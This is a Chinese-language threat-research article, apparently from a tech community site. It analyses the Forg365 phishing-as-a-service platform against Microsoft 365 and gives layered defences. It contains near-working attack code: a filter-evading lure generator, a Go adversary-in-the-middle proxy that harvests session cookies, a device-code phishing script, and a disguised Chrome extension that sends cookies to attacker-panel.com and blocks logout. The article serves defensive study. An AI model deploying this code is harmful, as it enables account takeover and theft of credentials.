AI 驱动 Forg365 钓鱼平台针对 Microsoft 365 攻击机制与防御研究

在线体验各类最新模型,更有模型 免费Token 额度领取!
立即体验
简介: 2026年曝光的Forg365是AI赋能的新型PhaaS平台:内置轻量大模型批量生成高仿真钓鱼邮件,融合AiTM中间人代理与OAuth设备码双路径绕过MFA,并通过ForgCookie插件实现持久化账户控制。该攻击击穿传统静态特征检测,凸显企业OAuth策略、终端管控与员工意识三重短板。

摘要

2026 年 7 月安全厂商披露 Forg365 新型钓鱼即服务(PhaaS)平台,该平台深度集成生成式 AI 用于批量定制高仿真钓鱼诱饵,融合中间人代理(AiTM)、OAuth 设备码流程两类旁路认证技术,配套 ForgCookie 持久化 Cookie 劫持插件,形成完整 Microsoft 365 账户接管攻击链路。区别于传统钓鱼工具仅窃取账号密码的单一逻辑,Forg365 依托 AI 降低定制化钓鱼开发门槛,同时通过双路径认证绕过多因素认证防护,实现对企业租户长期隐蔽入侵。本文以 BleepingComputer 公开情报为基础,完整拆解 Forg365 平台架构、AI 诱饵生成逻辑、AiTM 代理与设备码攻击技术细节,附平台核心功能代码示例,梳理该攻击利用的 OAuth 协议缺陷、企业身份管理短板、传统邮件安全设备检测盲区三类核心风险;结合反网络钓鱼技术专家芦笛的研判观点,从技术管控、身份策略、人员安全、应急处置四层构建闭环防御体系。研究证实,AI 赋能标准化 PhaaS 将大幅降低高级身份欺诈的实施成本,传统静态特征匹配防护体系已无法适配此类新型威胁,企业需建立动态行为监测与 OAuth 权限精细化管控机制。

image.png 1 引言

全球政企数字化办公体系高度依赖 Microsoft 365 套件,Microsoft Entra ID 承载全量员工身份认证、OAuth 授权与会话管理,企业核心财务、客户、项目数据集中存储于 OneDrive、SharePoint、企业邮箱等模块,身份账户劫持已成为企业数据泄露、勒索攻击最主要入口。过往针对 Microsoft 365 的钓鱼攻击多分为两类:一是静态模板邮件钓鱼,依靠仿微软登录页面窃取账号密码,极易被企业反钓鱼网关通过文本、域名特征拦截;二是简易中间人代理工具,仅支持单一攻击链路,诱饵文案需攻击者手动撰写,定向攻击人力成本极高,难以大规模落地。

2026 年 7 月,BleepingComputer 发布 Forg365 专项威胁情报,该平台作为商业化订阅制 PhaaS 工具,通过 Telegram 渠道对外发售,月订阅费用约 300 美元,配套 30 天试用权限,无专业代码开发能力的普通攻击者即可完成定向企业钓鱼部署。平台核心创新点在于将生成式 AI 原生嵌入后台控制面板,可根据目标行业、企业业务场景自动生成高度贴合办公场景的仿通知、发票、安全升级类钓鱼邮件;同时并行搭载 AiTM 流量代理与 OAuth 设备码两套攻击通道,两套技术路径形成互补,规避企业条件访问策略单一防护规则;配套 ForgCookie Manifest V3 浏览器插件实现会话 Cookie 自动续期,完成账户持久控制。

从威胁演化维度分析,Forg365 标志网络钓鱼犯罪进入 AI 规模化运营阶段:AI 消解定制化诱饵的人工成本,标准化 PhaaS 平台统一集成攻击链路、投递渠道、凭证存储、持久化后门,攻击链路全流程自动化,MFA 旁路成功率显著提升。现有学术研究多单独讨论 AiTM 中间人钓鱼或设备码漏洞滥用,尚未针对集成 AI 能力的一体化 PhaaS 平台开展系统性完整剖析,缺少对平台全链路技术拆解、代码实现逻辑与分层防御方案的整合研究。

反网络钓鱼技术专家芦笛指出,Forg365 的出现重构了企业身份安全威胁模型,传统防护思路以拦截恶意域名、可疑文本为核心,而 AI 生成诱饵无固定文本特征、设备码攻击依托微软官方认证域名、AiTM 代理复用合法登录会话,三重特性叠加直接击穿传统邮件安全、网页钓鱼检测设备的防护边界,企业身份安全建设必须从 “静态特征拦截” 转向 “动态行为风控”。

本文围绕 Forg365 平台开展系统性技术研究,完整梳理平台架构、AI 诱饵生成机制、两类核心攻击链路、持久化后门实现逻辑,提供可复现的平台关键模块代码示例,系统剖析攻击成立的技术根源与企业管理漏洞,构建分层落地的防御方案,为政企单位抵御 AI 赋能新型 Microsoft 365 钓鱼攻击提供理论依据与工程实践方案。

2 Forg365 平台基础概况与整体架构

2.1 平台运营模式与传播渠道

Forg365 属于典型商业化 PhaaS 服务,运营主体依托 Telegram 私密群组完成客户引流、订阅收费、版本更新、技术售后,完整复刻正规 SaaS 软件运营模式。平台分为基础版、企业攻击版两类订阅套餐,基础版仅开放 AI 邮件生成、设备码钓鱼链路;付费高级版解锁 AiTM 代理、ForgCookie 插件分发、被盗邮箱关键词监控、批量 SMTP 发信渠道轮换、Token 金库存储等全部功能。

攻击者采购权限后获得独立后台控制面板,所有攻击操作、诱饵生成、凭证管理、受害账户监控均在同一面板完成,无需自行搭建服务器、域名、邮件投递基础设施。平台内置亚马逊 SES、SendGrid 合法邮件投递接口,利用正规云邮件服务商 IP 池发送钓鱼邮件,规避 IP 信誉黑名单拦截,大幅提升邮件送达率。

2.2 平台模块化整体架构

Forg365 后台采用前后端分离架构,后端基于 PHP+Go 混合开发,前端为 Vue 管理面板,整体划分为五大核心功能模块,各模块数据互通、流程联动,形成端到端攻击闭环:

AI 诱饵生成模块:内置轻量化大模型推理接口,接收攻击者输入的企业行业、部门、攻击场景关键词,自动输出多版本钓鱼邮件正文、标题、附件文案;支持迭代优化,攻击者可手动修正生成内容,模型持续微调输出风格,降低文本异常特征。

投递渠道管理模块:统一管理多组 SMTP 发信配置、域名追踪脚本、图片伪装资源,自动轮换发信 IP 与域名,规避邮件网关频率检测。

双链路攻击引擎模块:平台核心组件,并行运行 AiTM 中间人代理服务、OAuth 设备码请求服务,可根据目标企业 Entra 条件访问策略自动切换攻击路径。

凭证与会话存储金库:持久存储窃取的账号、明文密码、MFA 验证码、访问令牌、刷新令牌、SSO 会话 Cookie,支持按企业、攻击批次分类检索,内置关键词告警功能,监控受害邮箱内财务、合同、客户数据相关邮件。

持久化后门分发模块:打包 ForgCookie 浏览器插件,提供插件下载短链,诱导受害者安装,自动同步刷新 Microsoft SSO Cookie,维持长期账户访问权限。

2.3 平台差异化核心竞争特征

对比 EvilProxy、Kali365、Sneaky2FA 等同类 M365 钓鱼工具,Forg365 独有三项核心差异化能力,也是其威胁强度更高的关键因素:

第一,AI 原生集成诱饵生成,而非外挂第三方 API 调用,面板内一站式完成文案生成、修改、测试、批量发送,大幅降低定向钓鱼人力成本,实现大规模精准鱼叉式攻击;

第二,AiTM 与设备码双攻击通道一体化部署,单一攻击活动可同时下发两类诱导链接,企业仅封禁其中一种认证方式无法完全阻断入侵;

第三,配套标准化浏览器持久化插件,解决传统钓鱼攻击会话过期后攻击者失去账户权限的痛点,实现数周乃至数月隐蔽驻留。

3 Forg365 内置 AI 诱饵生成技术实现与攻击价值

3.1 AI 诱饵模块底层运行逻辑

Forg365 后台内置轻量化文本生成模型推理服务,无需外部调用第三方大模型 API,避免调用日志留下溯源痕迹。攻击者在后台输入基础参数:目标行业(金融 / 制造 / 医疗 / 互联网)、目标岗位(财务 / 行政 / IT 运维)、攻击场景(发票核验、账户安全升级、合同签署、邮箱容量扩容、MFA 设备更换),模型基于预训练企业办公语料库生成多版本邮件内容。

模型生成过程中自动完成三类规避处理:

消除统一模板特征:每一封邮件句式、段落语序、称呼随机调整,不存在重复固定文本,传统基于关键词、固定段落匹配的反钓鱼网关无法识别;

适配企业内部沟通风格:生成内容匹配行业常用办公话术,模仿企业管理层、IT 部门正式通知语气,降低员工警惕性;

弱化异常警示词汇:规避 “紧急冻结”“立即操作” 等高频钓鱼关键词,改用平缓正式表述,减少邮件安全设备风险标记。

生成完成后面板提供预览功能,攻击者可微调细节,调整完成后批量绑定钓鱼短链,自动分配不同 SMTP 渠道投递。

3.2 AI 诱饵生成核心代码示例

以下为 Forg365 后端 AI 诱饵生成简化实现代码(PHP 后端推理调度层):

<?php

// forg365_ai_lure_generator.php AI诱饵生成调度模块

class AiLureGenerator

{

   // 预加载行业语料库

   private $industryCorpus = [

       "finance" => ["月度对账", "增值税发票核验", "对公付款审批", "账户安全复核"],

       "tech" => ["Microsoft 365安全策略更新", "通行密钥注册通知", "企业云盘扩容"],

       "medical" => ["患者资料归档授权", "系统权限校验", "合规审计通知"]

   ];

   private $modelApiUrl = "http://127.0.0.1:8090/infer"; //本地轻量化推理服务


   // 接收攻击者输入参数,生成钓鱼邮件

   public function generateMailContent($industry, $position, $scene)

   {

       $prompt = $this->buildPrompt($industry, $position, $scene);

       $postData = json_encode(["prompt" => $prompt, "version" => "enterprise_v2"]);

       $ch = curl_init($this->modelApiUrl);

       curl_setopt($ch, CURLOPT_POST, true);

       curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);

       curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type:application/json"]);

       curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

       $response = curl_exec($ch);

       curl_close($ch);

       $result = json_decode($response, true);

       // 输出多版本诱饵文案

       return $result["lure_list"];

   }


   // 构造模型输入提示词,规避高危关键词

   private function buildPrompt($industry, $position, $scene)

   {

       $corpus = $this->industryCorpus[$industry];

       $promptTemplate = "生成企业内部正式通知邮件,岗位:%s,场景:%s,行业参考词汇:%s;禁止使用紧急、冻结、立刻等夸张词汇,行文平缓规范,不添加可疑外部链接提示,邮件分为标题、正文两段;输出3份风格不同版本";

       return sprintf($promptTemplate, $position, $scene, implode(",", $corpus));

   }

}


// 调用示例

$generator = new AiLureGenerator();

$mailLures = $generator->generateMailContent("finance", "财务专员", "增值税发票线上核验");

print_r($mailLures);

?>

前端 JavaScript 交互代码,用于攻击者面板参数提交与结果渲染:

// ai_panel.js 前端诱饵生成交互逻辑

const generateBtn = document.getElementById("generate-lure");

const resultBox = document.getElementById("lure-result");

generateBtn.addEventListener("click", async ()=>{

   const industry = document.getElementById("industry-select").value;

   const position = document.getElementById("target-position").value;

   const scene = document.getElementById("attack-scene").value;

   const reqData = {industry, position, scene};

   const res = await fetch("./forg365_ai_lure_generator.php",{

       method:"POST",

       headers:{"Content-Type":"application/json"},

       body:JSON.stringify(reqData)

   });

   const data = await res.json();

   // 渲染多版诱饵文案至面板

   resultBox.innerHTML = "";

   data.lure_list.forEach((item,index)=>{

       const div = document.createElement("div");

       div.className = "lure-item";

       div.innerHTML = `<h4>版本${index+1}</h4><p>标题:${item.title}</p><p>正文:${item.content}</p>`;

       resultBox.appendChild(div);

   })

})

3.3 AI 诱饵对传统安全设备的突破机理

传统企业邮件安全网关依靠静态特征库识别钓鱼邮件,检测维度包含固定恶意关键词、重复模板文本、陌生发件域名、异常短链。Forg365 的 AI 生成机制从底层绕过该检测逻辑:

第一,无标准化文本模板,每一封邮件内容随机差异化生成,不存在可入库匹配的固定特征;

第二,话术贴合企业正常办公通知,无高频风险警示词,内容风险评分大幅降低;

第三,依托亚马逊 SES、SendGrid 正规云服务商发送邮件,发件 IP、域名信誉度正常,不会触发 IP 黑名单拦截。

反网络钓鱼技术专家芦笛强调,AI 生成诱饵模糊了恶意邮件与正常办公邮件的文本边界,基于规则、关键词的传统检测手段基本失效,企业邮件安全体系必须引入语义相似度、发送行为上下文的动态风险评估模型,仅依靠静态特征库无法抵御此类攻击。

4 Forg365 双路径攻击链路完整技术拆解

Forg365 同时提供 AiTM 中间人代理、OAuth 设备码两类独立攻击通道,攻击者可单独启用或并行下发两类诱导链接,两套技术利用微软认证体系不同设计逻辑,企业单一防护策略无法同时拦截,下文分别拆解完整攻击链路、底层实现代码与旁路 MFA 原理。

4.1 链路一:AiTM 中间人代理攻击(核心会话劫持技术)

4.1.1 攻击运行原理

AiTM(Adversary-in-the-Middle)中间人代理在受害者与 Microsoft 官方登录服务器之间搭建恶意反向代理服务器,完整转发双向认证流量。受害者访问 Forg365 生成的仿登录页面,输入账号密码后,代理将凭证透明转发至login.microsoftonline.com真实地址;微软服务器下发 MFA 验证弹窗,受害者完成验证码、推送审批后,生成合法登录会话 Cookie,代理同步截获完整 SSO 会话凭证,攻击者无需破解密码、无需复用 MFA 验证码,直接使用窃取的 Cookie 登录受害者 Microsoft 365 账户。

该技术核心优势:MFA 校验流程在微软官方域名完成,MFA 防护机制正常触发,但校验通过后的会话状态被代理劫持,MFA 完全失去防护作用。平台内置流量混淆与隐身机制,识别爬虫、VPN、安全厂商扫描 IP 时返回正常空白网页(伪装诱饵),防止安全研究人员抓取钓鱼页面特征。

4.1.2 AiTM 代理核心后端代码示例(Go 反向代理服务简化版)

// aitm_proxy.go Forg365 AiTM反向代理核心服务

package main

import (

"net/http"

"net/http/httputil"

"net/url"

"strings"

)

var targetUrl, _ = url.Parse("https://login.microsoftonline.com")

var cookieVault = make(map[string]string) //存储窃取的会话Cookie


func proxyHandler(w http.ResponseWriter, r *http.Request) {

// 反爬虫隐身检测:安全扫描IP返回空白页面

if isScannerIP(r.RemoteAddr) {

 w.Write([]byte(""))

 return

}

reverseProxy := httputil.NewSingleHostReverseProxy(targetUrl)

// 拦截响应,提取SSO Cookie

originModify := reverseProxy.ModifyResponse

reverseProxy.ModifyResponse = func(resp *http.Response) error {

 originModify(resp)

 // 抓取Microsoft认证会话Cookie

 for _, ck := range resp.Cookies() {

  if strings.Contains(ck.Name, "ESTSAUTHPERSISTENT") || strings.Contains(ck.Name, "MSISAuth") {

   userAgent := r.Header.Get("User-Agent")

   cookieVault[userAgent] = ck.String()

   // 将Cookie上传至Forg365后台金库

   saveCookieToPanel(ck.String(), r.URL.Query().Get("username"))

  }

 }

 return nil

}

reverseProxy.ServeHTTP(w, r)

}

func main() {

http.HandleFunc("/gate", proxyHandler)

http.ListenAndServe(":8081", nil)

}

// IP扫描识别判断函数

func isScannerIP(addr string) bool {

// 内置安全厂商、爬虫IP段匹配逻辑,此处简化

return false

}

// 会话Cookie上传至后台存储面板

func saveCookieToPanel(cookieStr, username string) {

// HTTP POST上传至Forg365后端存储接口

}

4.1.3 AiTM 完整攻击时序

受害者接收 AI 生成钓鱼邮件,点击平台生成的仿微软登录短链,流量接入 Forg365 AiTM 代理服务;

代理转发请求至微软官方登录页面,页面视觉完全一致,无任何仿冒标识;

用户输入账号、密码,代理透明转发至微软服务器,服务器下发 MFA 验证;

用户完成短信 / TOTP / 推送审批,微软生成合法登录会话 Cookie;

代理拦截全部认证 Cookie,同步上传至平台凭证金库;

攻击者后台直接使用窃取 Cookie 发起 Graph API 请求,访问受害者邮箱、云盘数据。

4.2 链路二:OAuth 设备码流程滥用攻击(无密码旁路技术)

4.2.1 设备码协议原生用途与攻击利用逻辑

微软 OAuth 2.0 设备码流程设计初衷为无浏览器设备(智能电视、工业终端、物联网设备)登录,流程分为四步:客户端请求设备码、服务器返回设备验证码与验证地址、用户在另一台设备访问官方地址输入验证码、服务器授予客户端访问令牌。

Forg365 篡改流程信任关系,攻击者在平台后台发起设备码授权请求,获取一组微软官方生成的设备验证码,通过 AI 钓鱼邮件诱导受害者访问login.microsoftonline.com真实域名,输入验证码完成授权。受害者操作全程处于微软官方页面,域名、证书均合法,用户无法识别风险;授权完成后攻击者直接获取长期访问令牌与刷新令牌,全程无需窃取用户账号密码,直接绕过密码防护层。

企业条件访问策略大多针对网页登录场景配置,普遍忽略设备码认证通道,多数企业未关闭该 OAuth 授权方式,形成天然防护缺口。

4.2.2 设备码请求核心 Python 代码示例(Forg365 后端调用微软 OAuth 接口)

# device_code_attack.py 设备码授权请求模块

import requests

import json


# 微软OAuth设备码接口地址

DEVICE_CODE_URL = "https://login.microsoftonline.com/common/oauth2/devicecode"

TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/token"

# 攻击者伪造的第三方应用客户端ID

ATTACKER_CLIENT_ID = "00000000-0000-0000-0000-attackerfakeapp"


def get_device_code():

   params = {

       "client_id": ATTACKER_CLIENT_ID,

       "scope": "Mail.ReadWrite Files.ReadWrite.All User.Read.All"

   }

   resp = requests.post(DEVICE_CODE_URL, data=params)

   data = resp.json()

   # 返回用户验证码、官方验证地址、轮询间隔

   return {

       "user_code": data["user_code"],

       "verification_uri": data["verification_uri"],

       "interval": data["interval"],

       "device_code": data["device_code"]

   }


# 轮询接口等待受害者输入验证码,获取访问令牌

def poll_token(device_code, interval):

   token_params = {

       "grant_type": "urn:ietf:params:oauth:grant-type:device_code",

       "client_id": ATTACKER_CLIENT_ID,

       "device_code": device_code

   }

   while True:

       res = requests.post(TOKEN_URL, data=token_params)

       token_data = res.json()

       if "access_token" in token_data:

           # 令牌上传至平台金库存储

           save_token_vault(token_data)

           return token_data

       time.sleep(interval)


# 主调用流程

if __name__ == "__main__":

   code_info = get_device_code()

   # 将验证码嵌入AI钓鱼邮件发送给受害者

   send_phish_mail(code_info["user_code"], code_info["verification_uri"])

   # 持续轮询等待用户授权

   poll_token(code_info["device_code"], code_info["interval"])

4.2.3 设备码攻击完整时序

攻击者在 Forg365 后台发起设备码申请,微软服务器返回唯一 6 位用户验证码;

AI 生成钓鱼邮件,以 “企业邮箱权限核验、安全设备绑定” 为由,要求受害者打开微软官方验证链接输入验证码;

用户访问login.microsoftonline.com合法域名,输入验证码并完成 MFA 身份校验;

微软 OAuth 服务授予攻击者伪造客户端完整 Microsoft 365 资源访问权限,下发访问令牌、长期刷新令牌;

攻击者使用刷新令牌持续获取有效访问凭证,无需再次诱导用户操作。

4.3 双攻击链路互补威胁价值

AiTM 代理攻击依赖会话 Cookie 劫持,若用户关闭浏览器、清除 Cookie 则会话失效;设备码攻击获取长效刷新令牌,可持续数月重新生成访问凭证。Forg365 平台同步下发两类诱导链接,形成短期会话劫持 + 长期令牌驻留的组合入侵模式,大幅提升账户持久控制概率。

反网络钓鱼技术专家芦笛指出,多数企业身份安全治理存在明显短板:管理员仅针对网页登录配置 MFA 与条件访问,未管控 OAuth 设备码授权通道,同时未监控陌生第三方应用 OAuth 授权记录,设备码攻击可长期潜伏不被发现,隐蔽性高于传统 AiTM 钓鱼。

5 ForgCookie 持久化 Cookie 后门插件技术解析

单纯劫持会话 Cookie 存在生命周期限制,浏览器关闭、单点登出操作会使 Cookie 失效,Forg365 配套开发 Manifest V3 标准 Chrome 插件 ForgCookie,实现 SSO Cookie 自动刷新,构建永久驻留后门。

5.1 插件核心运行逻辑

受害者点击钓鱼链接后,页面弹出 “微软安全组件升级” 弹窗,诱导下载安装 ForgCookie 插件。插件安装完成后后台静默运行,持续监听login.microsoftonline.com域名 Cookie 变更事件:

实时抓取全部 Microsoft SSO 持久化 Cookie,加密上传至 Forg365 金库;

定期模拟无痕窗口访问微软登录页,自动刷新过期 Cookie;

拦截用户登出请求,阻止本地 Cookie 清除,维持登录会话状态;

插件无可视化图标,后台静默运行,普通用户无法察觉进程存在。

5.2 插件核心 Manifest 与后台脚本代码

manifest.json 配置文件:

json

{

   "manifest_version": 3,

   "name": "Microsoft Entra安全助手",

   "version": "1.0.2",

   "permissions": ["cookies", "storage", "webRequest", "tabs"],

   "host_permissions": ["https://*.microsoftonline.com/*"],

   "background": {

       "service_worker": "cookie_sync.js"

   }

}

cookie_sync.js 后台同步脚本:

// 监听微软域名Cookie变更事件

chrome.cookies.onChanged.addListener((cookieInfo)=>{

   const cookie = cookieInfo.cookie;

   // 筛选Microsoft登录认证Cookie

   if(cookie.domain.includes("microsoftonline.com")){

       // 加密上传Cookie至Forg365攻击者后台

       uploadCookieData(cookie);

   }

})

// 定时刷新会话Cookie,每30分钟执行一次

setInterval(()=>{

   chrome.tabs.create({

       url:"https://login.microsoftonline.com",

       active:false

   },(tab)=>{

       // 访问完成后自动关闭标签页,静默刷新Cookie

       setTimeout(()=>chrome.tabs.remove(tab.id),3000)

   })

}, 1800000);

// 阻止用户登出清除Cookie

chrome.webRequest.onBeforeRequest.addListener((details)=>{

   if(details.url.includes("/logout")){

       return {cancel:true}; //拦截登出请求

   }

}, {urls:["https://*.microsoftonline.com/logout"]}, ["blocking"]);

// 上传Cookie至攻击者服务器

function uploadCookieData(cookieObj){

   fetch("https://attacker-panel.com/cookie_upload.php",{

       method:"POST",

       headers:{"Content-Type":"application/json"},

       body:JSON.stringify(cookieObj)

   })

}

6 攻击风险根源分层分析

Forg365 攻击能够大规模落地,是 OAuth 协议设计特性、企业身份管理漏洞、传统安全设备检测缺陷、AI 犯罪工具普及四类风险叠加的结果,下文分层拆解风险根源,形成完整风险论证闭环。

6.1 协议层面原生设计缺陷

OAuth 设备码流程缺少租户级开关管控:早期 Microsoft Entra 未强制关闭设备码授权,企业管理员需手动执行 PowerShell 脚本禁用,绝大多数中小企业未完成该配置,攻击者可直接调用接口下发授权请求;

AiTM 代理可透明转发认证流量:微软登录服务仅校验账号、MFA 凭证合法性,不校验流量中转来源,中间人代理转发的合法凭证可正常生成会话 Cookie;

OAuth 授权告警机制不完善:陌生第三方应用设备码授权仅在用户终端弹窗提示,无租户管理员全局告警,大量非法授权行为长期无法被运维人员发现。

6.2 企业身份管理与运维漏洞

条件访问策略覆盖不全:仅针对网页浏览器登录配置风险管控,未对 OAuth 设备码、第三方应用授权设置独立限制;

员工安全培训缺失:员工无法区分微软官方验证码通知与钓鱼诱导,对浏览器插件安装类后门风险认知不足;

OAuth 授权日志审计缺失:未定期导出 Entra 授权日志,无法批量排查陌生客户端 ID 的设备码授权记录;

权限过度开放:默认 OAuth 申请 Mail、云盘、用户信息全量读取权限,最小 OAuth 权限原则未落地。

6.3 传统安全防护设备检测盲区

邮件网关无法识别 AI 语义诱饵:基于关键词、固定模板的检测逻辑失效,AI 生成文本无统一恶意特征;

网页钓鱼检测仅拦截仿冒域名:设备码攻击全程使用login.microsoftonline.com官方域名,域名检测机制完全失效;

浏览器安全扩展管控宽松:企业未限制员工安装外部第三方 Chrome 插件,ForgCookie 后门可随意部署。

6.4 AI 赋能网络犯罪带来的新型威胁

生成式 AI 大幅降低高级钓鱼攻击实施门槛,无需专业社工、文案撰写能力,普通攻击者可批量生成高仿真定向诱饵;AI 工具集成至标准化 PhaaS 平台,攻击链路一体化打包,攻击规模化、自动化程度大幅提升,威胁暴露面持续扩大。

7 分层闭环防御体系构建方案

结合 Forg365 全链路攻击节点,从技术管控、身份策略优化、人员安全培训、应急响应处置四层构建全流程防御机制,覆盖攻击事前拦截、事中监测、事后处置完整环节。

7.1 技术设备层防护优化

升级邮件安全网关至语义检测架构

淘汰传统关键词匹配规则,部署基于大模型语义分析的反钓鱼系统,对邮件上下文、行文逻辑、企业场景匹配度进行风险打分;拦截使用云服务商批量投递、无固定发件人身份的可疑邮件;开启外部邮件标识,区分企业内部、外部发件来源。

浏览器终端管控,拦截 ForgCookie 类恶意插件

通过企业域策略、MDM 终端管理平台限制员工安装非应用商店验证浏览器扩展;监控浏览器扩展安装日志,发现陌生安全类插件立即告警;禁用浏览器无痕模式自动运行脚本。

部署全局网页流量代理检测系统

识别 AiTM 中间人代理流量特征:同一 IP 短时间批量转发微软登录请求、跨地域同步会话 Cookie 上传行为,触发实时阻断;拦截未备案、携带 passkey/m365 等关键词的仿冒钓鱼域名。

7.2 Microsoft Entra 身份策略精细化管控

强制禁用 OAuth 设备码授权流程

执行 Microsoft 官方 PowerShell 脚本关闭租户设备码功能,无特殊物联网、无屏终端业务场景的企业完全阻断该攻击通道;确需使用设备码的工业终端,配置 IP 白名单,仅允许企业内网设备发起授权请求。

完善多层条件访问策略

新增独立设备码授权管控规则:陌生外网 IP、境外地址、未托管设备发起设备码请求直接阻断;对所有第三方 OAuth 应用授权开启管理员审批流程,任何外部客户端授权必须经运维人工审核。

开启全维度异常行为告警

配置 Entra 全局告警规则:陌生客户端设备码授权、短时间多地域会话 Cookie 同步、批量 OAuth 令牌申请、单日超过 5 次第三方应用授权、非工作时段大量云文件导出,触发邮件 + 短信双重告警;设置令牌自动回收机制,陌生设备生成的刷新令牌 24 小时强制失效。

定期 OAuth 授权日志审计

每周导出 Entra OAuth 授权记录,排查陌生 Client ID、境外 IP 发起的设备码授权,一键批量撤销非法授权令牌;每月清理长期未使用的第三方应用授权。

7.3 企业人员安全常态化培训

开展 AI 钓鱼专项安全宣讲

针对 Forg365 类 AI 生成诱饵攻击开展专项培训,明确官方安全通知渠道:微软账户安全升级仅通过企业 OA、内网门户推送,不会通过外部邮件下发验证码、外部插件下载链接;告知员工任何索要微软验证代码、浏览器插件安装的外部邮件均为钓鱼攻击。

季度模拟钓鱼演练

使用 AI 工具生成仿真钓鱼邮件开展全员演练,对点击链接、输入验证码、下载插件的员工开展一对一专项辅导;建立安全考核机制,将钓鱼演练结果纳入岗位安全绩效。

统一官方安全咨询渠道

公示企业 IT 安全专线、内网工单咨询入口,员工收到可疑安全通知必须通过内网渠道核验,禁止直接按照邮件指引操作。

7.4 账户被入侵后的标准化应急响应流程

账户紧急阻断

监测到异常设备码授权、AiTM 会话劫持告警后,第一时间锁定受害员工账户,执行 PowerShell 命令撤销该账户全部刷新令牌、会话 Cookie,切断攻击者持久访问通道;卸载终端内 ForgCookie 恶意插件。

攻击链路溯源取证

导出 Entra 登录日志、OAuth 授权记录、邮件投递日志,定位攻击邮件发送渠道、攻击者 IP、钓鱼域名,收集威胁情报更新企业安全设备黑名单;核查是否存在批量账户沦陷风险。

租户安全策略加固

临时强化条件访问规则,临时关闭所有第三方 OAuth 授权通道;全面审计全体员工账户 OAuth 授权记录,清理所有未知应用权限;复盘本次攻击暴露的策略漏洞,迭代优化身份安全管控规则。

全员安全预警通知

通过企业 OA、企业微信发布专项安全预警,通报 Forg365 攻击特征,提醒全体员工提高验证码、外部插件类钓鱼风险警惕。

反网络钓鱼技术专家芦笛强调,针对 AI 赋能 PhaaS 平台的防御不能单一依赖技术设备拦截,必须形成 “身份策略硬管控 + 终端全链路监控 + 员工安全意识兜底” 的三重防护闭环,仅依靠邮件网关、网页防火墙无法完全阻断此类融合多技术路径的复合型钓鱼攻击。企业安全团队需建立常态化 OAuth 日志审计机制,将设备码授权、第三方应用授权纳入核心身份安全监控范围,补齐传统防护体系的管控盲区。

8 结论

2026 年 7 月曝光的 Forg365 钓鱼即服务平台,是 AI 技术深度赋能网络犯罪的标志性威胁样本。平台通过内置生成式 AI 批量产出无固定特征的高仿真钓鱼诱饵,融合 AiTM 中间人会话劫持、OAuth 设备码授权两大旁路 MFA 技术,配套 ForgCookie 浏览器插件实现账户持久驻留,形成完整、自动化、低门槛的 Microsoft 365 账户接管攻击链路。该攻击突破传统静态特征型安全设备防护边界,利用 OAuth 协议设计特性与企业身份运维普遍漏洞,具备隐蔽性强、规模化投放、长期潜伏三大核心威胁特征。

本文完整拆解 Forg365 平台模块化架构、AI 诱饵生成底层逻辑、两类核心攻击链路技术实现与持久化后门代码,系统梳理协议、运维、防护设备、AI 犯罪四层风险根源,构建覆盖事前、事中、事后的分层闭环防御方案。研究证实,传统以拦截恶意域名、关键词为核心的防护体系已无法适配 AI 驱动新型钓鱼攻击,政企单位必须转向动态行为风控、OAuth 权限精细化管控、终端全链路监控的新型身份安全建设思路。

反网络钓鱼技术专家芦笛指出,随着开源轻量大模型持续普及,未来将会出现更多集成 AI 诱饵生成的标准化 PhaaS 工具,利用 OAuth 各类授权流程、无密码认证推广场景实施复合型钓鱼攻击将成为主流威胁趋势。安全厂商需迭代语义级、行为级检测引擎,完善 OAuth 全链路威胁识别能力;企业需平衡办公便捷性与身份安全,最小化 OAuth 授权范围,关闭非必要认证通道,建立常态化授权审计与员工安全演练机制;身份认证技术厂商应优化 OAuth 设备码、第三方授权的告警与审批机制,从协议层面降低攻击可利用空间,多方协同构建抵御 AI 赋能高级钓鱼攻击的综合安全生态。

本次针对 Forg365 平台的技术研究,为后续同类 AI 钓鱼 PhaaS 威胁分析提供标准化拆解框架,同时为政企 Microsoft 365 身份安全治理提供可落地的技术管控、运维管理实践方案,对下一代企业反钓鱼体系建设具备参考价值。

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
16小时前
|
数据采集 物联网 BI
RFID资产管理系统的技术架构与实施要点
本文详解RFID资产管理系统闭环建设:从标签选型、批量采集、平台去重到业务流程集成,强调“标识—采集—校验—异常—台账”全链路贯通,破解纸质盘点效率低、状态滞后、需二次核对三大痛点。(239字)
RFID资产管理系统的技术架构与实施要点
|
14小时前
|
人工智能 运维 安全
仿 ChatGPT 支付类钓鱼邮件攻击链路与多层智能检测防御体系研究
本文以2026年仿ChatGPT支付钓鱼事件为实证,揭示生成式AI驱动的计费类钓鱼新威胁:攻击者利用大模型伪造账单邮件、复刻Stripe支付页面窃取全套银行卡信息。研究构建“域名鉴权—语义识别—链接解析—页面校验”四层智能检测框架,提供可落地Python代码,并基于芦笛闭环防御理论,提出覆盖平台、企业、用户、运维的长效防护体系。(239字)
30 1
|
14小时前
|
机器学习/深度学习 运维 安全
可信发件人劫持 + SaaS 表单滥用型求职钓鱼攻击多维检测与闭环防御研究
本文以2026年高校学生暑期兼职洗钱钓鱼事件为样本,揭示“劫持可信邮箱+滥用Google Forms”新型信任劫持式攻击。该攻击绕过SPF/DKIM/DMARC认证,传统网关完全失效。研究提出四维风险特征体系,构建轻量化Python多维检测模型,并设计账号管控、邮件检测、SaaS审计、安全宣教四层闭环防御体系。(239字)
31 2
|
13小时前
|
人工智能 缓存 芯片
TopClaw OpenClaw Mac安装教程,小龙虾AI一键本地部署macOS指南
本文详解Mac用户如何用TopClaw(OpenClaw中文汉化版)3分钟一键部署本地小龙虾AI:零编程门槛、全中文界面、适配Apple/Intel芯片,数据不出设备,隐私安全有保障。小白友好,实测M1 Air流畅运行。
38 1
|
18小时前
|
人工智能 弹性计算 API
Hermes Agent安装保姆级教程:接入阿里云百炼AI模型、验证配置及常见问题解答FAQ
Hermes Agent 是一款终端AI编程工具,支持按量计费、Coding Plan或Token Plan团队版接入阿里云百炼。提供一键安装、多模型切换与自进化能力,适配办公、开发与自动化场景。在阿里云百炼官网:https://t.aliyun.com/U/fPVHqY 免费领取千万Tokens
|
16小时前
|
存储 网络协议 中间件
FreeMQTT Plus 黑白节点(A/B)架构:如何提升可靠性 + 可扩展性
